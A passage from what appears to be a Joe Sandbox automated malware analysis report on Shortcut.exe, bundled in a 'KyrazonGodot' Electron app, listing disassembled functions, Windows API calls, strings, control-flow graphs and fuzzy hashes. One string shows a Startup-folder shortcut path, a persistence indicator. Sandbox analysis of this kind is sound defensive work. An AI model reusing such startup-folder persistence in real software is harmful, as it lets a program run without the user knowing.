                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 352835431-0
                                                                                      • Opcode ID: ea44ea31750123c118c7cb7bcb254ee29c9b55dd60e05c025c57dd21b0bbfed4
                                                                                      • Instruction ID: dc4c128a57a91bf777db52d69db1374881bc6d12f7daaae6598e61c0e71bf4b4
                                                                                      • Opcode Fuzzy Hash: ea44ea31750123c118c7cb7bcb254ee29c9b55dd60e05c025c57dd21b0bbfed4
                                                                                      • Instruction Fuzzy Hash: EA518D71900209EBCF218F54CD45A9F7FB9FB89750F10412AFA11B22A0C73A9D51EB69
                                                                                      Function 00404DB1 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 870 404db1-404dbf 871 404dc4-404dc6 870->871 872 404dd3-404ddf 871->872 873 404dc8-404dd1 871->873 874 404f01-404f03 872->874 875 404de5-404ded 872->875 873->871 873->872 876 404df3-404df5 875->876 877 404edb-404efb call 4052a0 GetStdHandle WriteFile 875->877 879 404e04-404e0a 876->879 880 404df7-404dfe 876->880 877->874 879->874 882 404e10-404e26 GetModuleFileNameA 879->882 880->877 880->879 883 404e28-404e3a call 405790 882->883 884 404e3b-404e53 call 4052a0 882->884 883->884 889 404e55-404e7b call 4052a0 call 406e70 884->889 890 404e7e-404ed9 call 405790 call 4057a0 * 3 call 406ddd 884->890 889->890 890->874
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404E1E
                                                                                      • GetStdHandle.KERNEL32(000000F4,004084A4,00000000,?,00000000,00000000), ref: 00404EF4
                                                                                      • WriteFile.KERNEL32(00000000), ref: 00404EFB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandleModuleNameWrite
                                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                      • API String ID: 3784150691-4022980321
                                                                                      • Opcode ID: 30b936380cc59e19e2007ed0e2613212ab886e614505033bbc4c70df2dfa4f07
                                                                                      • Instruction ID: c3739314f749ab5ff334de0654ff45aa8e77e5660a3604bab486777a7459bbb9
                                                                                      • Opcode Fuzzy Hash: 30b936380cc59e19e2007ed0e2613212ab886e614505033bbc4c70df2dfa4f07
                                                                                      • Instruction Fuzzy Hash: 8C31A372A00219AFDF20A760CE49F9B736CEF85304F5004BFF644F61C1EA78A9548A5E
                                                                                      Function 00401C20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71librarywindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 905 401c20-401c51 906 401c53-401c59 905->906 907 401c6b-401c93 FormatMessageA 905->907 906->907 908 401c5b-401c69 LoadLibraryExA 906->908 909 401c95-401cd1 call 4029c7 LocalFree 907->909 910 401cd7-401cd9 907->910 908->907 909->910 912 401ce2-401ceb 910->912 913 401cdb-401cdc FreeLibrary 910->913 913->912
                                                                                      APIs
                                                                                      • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,00000000,002A6465), ref: 00401C63
                                                                                      • FormatMessageA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,00000000,002A6465), ref: 00401C8B
                                                                                      • LocalFree.KERNEL32(?), ref: 00401CD1
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00401CDC
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 00401C2D
                                                                                      • netmsg.dll, xrefs: 00401C5E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary$FormatLoadLocalMessage
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk$netmsg.dll
                                                                                      • API String ID: 1722898185-3875874706
                                                                                      • Opcode ID: bbc13b76aba806f605010e0eb7f1a5f078aa48583d78ad11b2a53ee9d95a81f7
                                                                                      • Instruction ID: 676477643adce46a94e7e182497c34522d164a9c87c1d9f1abf55ae9b015515e
                                                                                      • Opcode Fuzzy Hash: bbc13b76aba806f605010e0eb7f1a5f078aa48583d78ad11b2a53ee9d95a81f7
                                                                                      • Instruction Fuzzy Hash: E31159313443405BF3149A64DD85FABB699EBC4704F04893DBA96A71D0CE789D0CC6AD
                                                                                      Function 00404F04 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStringTypeW.KERNEL32(00000001,004081F4,00000001,?,00000103,00000001,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00404F43
                                                                                      • GetStringTypeA.KERNEL32(00000000,00000001,004081F0,00000001,?,?,?,00000000,00000001), ref: 00404F5D
                                                                                      • GetStringTypeA.KERNEL32(?,?,?,00000000,00200020,00000103,00000001,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00404F91
                                                                                      • MultiByteToWideChar.KERNEL32(00405CFC,00000002,?,00000000,00000000,00000000,00000103,00000001,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00404FC9
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 0040501F
                                                                                      • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 00405031
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: StringType$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 3852931651-0
                                                                                      • Opcode ID: 10c2dd83d6c4891f4b19a69c398e9b50d9e8c1fd6f195fed43029adedc618a4a
                                                                                      • Instruction ID: e8077265912694feb20199444432bd54d64186ba5fb9de02ee2b6094005642b9
                                                                                      • Opcode Fuzzy Hash: 10c2dd83d6c4891f4b19a69c398e9b50d9e8c1fd6f195fed43029adedc618a4a
                                                                                      • Instruction Fuzzy Hash: 4D416EB190061AAFCF209F94DD85EAF7BB8EB04754F10443AFA15B2290D73889559BE8
                                                                                      Function 00404A02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32 ref: 00404A21
                                                                                      • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00404A56
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00404AB6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                      • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                      • API String ID: 1385375860-4131005785
                                                                                      • Opcode ID: c2e46501cb34ff5ec822bfb9ec5beae3fa957931afad9139806d236dc87c07b5
                                                                                      • Instruction ID: bd575d6e86409f67b89e6321b2ac6b3d904a07d1e09031c5d33df5c7808616b4
                                                                                      • Opcode Fuzzy Hash: c2e46501cb34ff5ec822bfb9ec5beae3fa957931afad9139806d236dc87c07b5
                                                                                      • Instruction Fuzzy Hash: 5931C3F1A8124869EB3196705C45B9B37689B86304F2404FFD385F62C2E678DA89CF1D
                                                                                      Function 0040482A Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00404883
                                                                                      • GetFileType.KERNEL32(00000800), ref: 00404929
                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00404982
                                                                                      • GetFileType.KERNEL32(00000000), ref: 00404990
                                                                                      • SetHandleCount.KERNEL32 ref: 004049C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                      • String ID:
                                                                                      • API String ID: 1710529072-0
                                                                                      • Opcode ID: 185b7c6d422e415d3ebbcbce5bc206f78151db82d189772629bd0f1d3015a871
                                                                                      • Instruction ID: fc641859bd4fd339b69d41a431ef02c5b98227dccaa49943cb6363da23072a57
                                                                                      • Opcode Fuzzy Hash: 185b7c6d422e415d3ebbcbce5bc206f78151db82d189772629bd0f1d3015a871
                                                                                      • Instruction Fuzzy Hash: DE5126F29042418BD7219B38CA44B673B90EB91320F15477EEAE6FB3E1D738D8498759
                                                                                      Function 004067B9 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,?,?,?,00404B90), ref: 004067DA
                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,?,?,00404B90), ref: 004067FE
                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,?,?,00404B90), ref: 00406818
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00404B90), ref: 004068D9
                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00404B90), ref: 004068F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 714016831-0
                                                                                      • Opcode ID: 3ea6627101bb3f8d28e1942db286dffea8f3837542d8e6896e24ece2c93cb393
                                                                                      • Instruction ID: acd04c8510f0ef6fb46427d060ff61076c05d727fdb6601c2505802ebc05d4dd
                                                                                      • Opcode Fuzzy Hash: 3ea6627101bb3f8d28e1942db286dffea8f3837542d8e6896e24ece2c93cb393
                                                                                      • Instruction Fuzzy Hash: 093107719017019BD3309F24DD44B22B7A0EB44754F12813EE996B77D0EB78A828974E
                                                                                      Function 00405FDB Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,74DEDFF0,?,00000000), ref: 00406233
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040628E
                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 004062A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Virtual$Heap
                                                                                      • String ID: -@
                                                                                      • API String ID: 2016334554-2999422947
                                                                                      • Opcode ID: 7d61b6457e1237e3b9ff3d33e82737f19d6c99c2ed17d01c58d2f458cb4ceb82
                                                                                      • Instruction ID: 8d112c40a7e32810c9b14bef7942e7ca57f7158f26a784d4f7749efd28daf399
                                                                                      • Opcode Fuzzy Hash: 7d61b6457e1237e3b9ff3d33e82737f19d6c99c2ed17d01c58d2f458cb4ceb82
                                                                                      • Instruction Fuzzy Hash: 57B17C34A002059FDB14CF48CAD0A69B7B2FB58314F25C1AED85A6F392CB36ED55CB84
                                                                                      Function 0040703A Relevance: 6.1, APIs: 4, Instructions: 139fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000000,?), ref: 00407112
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: e09dc6fc6b4ea51e5cc7bed2f8298a0d2f54f69a7693411809a079bfa261a28d
                                                                                      • Instruction ID: fa558dee1c5888d74b13012bc73fa547acbbdb4bd3aac0d6447206d0587834ea
                                                                                      • Opcode Fuzzy Hash: e09dc6fc6b4ea51e5cc7bed2f8298a0d2f54f69a7693411809a079bfa261a28d
                                                                                      • Instruction Fuzzy Hash: D451C030E04208EFCB11CF68CD84A9E7BB5BF44340F20867AE815AB3D1D734AA45DB5A
                                                                                      Function 00402E93 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,00402DF9), ref: 00402EDB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: p@$p@
                                                                                      • API String ID: 1807457897-3476017769
                                                                                      • Opcode ID: 9c87afb81c43f763c10419f2450c277547e313204eabffc705f0cef67c751ea7
                                                                                      • Instruction ID: 3914f9005d033d98c17e43e3033144e2b41ad2eaa203b51ef0bd9b96ee6c7522
                                                                                      • Opcode Fuzzy Hash: 9c87afb81c43f763c10419f2450c277547e313204eabffc705f0cef67c751ea7
                                                                                      • Instruction Fuzzy Hash: AF419C308092529EE700CF35CA4876A7FE9AB05344F24087FD985B72D2C77D4A56E74D
                                                                                      Function 004030D2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 004030E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $
                                                                                      • API String ID: 1807457897-3032137957
                                                                                      • Opcode ID: 193a9108bf2fae721e54ffea3e769f283794f08f71930f22d67e2580e0bc7997
                                                                                      • Instruction ID: d8e3abf327adfc85c33f230852f3636ca1b15aa8834cc25d044d70c47297e251
                                                                                      • Opcode Fuzzy Hash: 193a9108bf2fae721e54ffea3e769f283794f08f71930f22d67e2580e0bc7997
                                                                                      • Instruction Fuzzy Hash: 4D415A310042986AEB119F25CE49FEB3F9C9B06701F1408FAD985FB1D2C2394B59D76A
                                                                                      Function 00402D6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersion.KERNEL32 ref: 00402D91
                                                                                        • Part of subcall function 00404B4A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DC9,00000000), ref: 00404B5B
                                                                                        • Part of subcall function 00404B4A: HeapDestroy.KERNEL32 ref: 00404B9A
                                                                                      • GetCommandLineA.KERNEL32 ref: 00402DDF
                                                                                        • Part of subcall function 00402E6F: ExitProcess.KERNEL32 ref: 00402E8C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                                                                                      • String ID: H*~
                                                                                      • API String ID: 1387771204-1495176569
                                                                                      • Opcode ID: c7a0977b9349a1d30c01abd58d83def3c08bb262b80e4292ab6daf9e85b70786
                                                                                      • Instruction ID: 02eb877745b522f99b33b0b935d98505204d0ac594d2280056544b862e450dca
                                                                                      • Opcode Fuzzy Hash: c7a0977b9349a1d30c01abd58d83def3c08bb262b80e4292ab6daf9e85b70786
                                                                                      • Instruction Fuzzy Hash: AC112EF1940601DFDB08AF66EE46B297765EB84758F10023EF605B72E1DB3D54408B69
                                                                                      Function 004044AB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe,00000104,?,?,?,?,?,?,00402DF9), ref: 004044CE
                                                                                      Strings
                                                                                      • H*~, xrefs: 004044D4
                                                                                      • C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe, xrefs: 004044C2, 004044CC, 004044F1, 00404527
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileModuleName
                                                                                      • String ID: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe$H*~
                                                                                      • API String ID: 514040917-3565149328
                                                                                      • Opcode ID: b226ddf778849ff2c88afa2836514ab9893f861d7d2e9a1157e8cc8a3d70ad25
                                                                                      • Instruction ID: d469abb2e43a93264971512b3f2a6025c8de6f1afa54191000fd3447a8906820
                                                                                      • Opcode Fuzzy Hash: b226ddf778849ff2c88afa2836514ab9893f861d7d2e9a1157e8cc8a3d70ad25
                                                                                      • Instruction Fuzzy Hash: 821191B2900118BFC711EB99CDC1D9F77ACEB85368B0001BBF605B7281E6749E04CBA8
                                                                                      Function 0040660D Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004063D5,?,?,?,00000100), ref: 00406635
                                                                                      • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004063D5,?,?,?,00000100), ref: 00406669
                                                                                      • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004063D5,?,?,?,00000100), ref: 00406683
                                                                                      • HeapFree.KERNEL32(00000000,?,?,00000000,004063D5,?,?,?,00000100), ref: 0040669A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
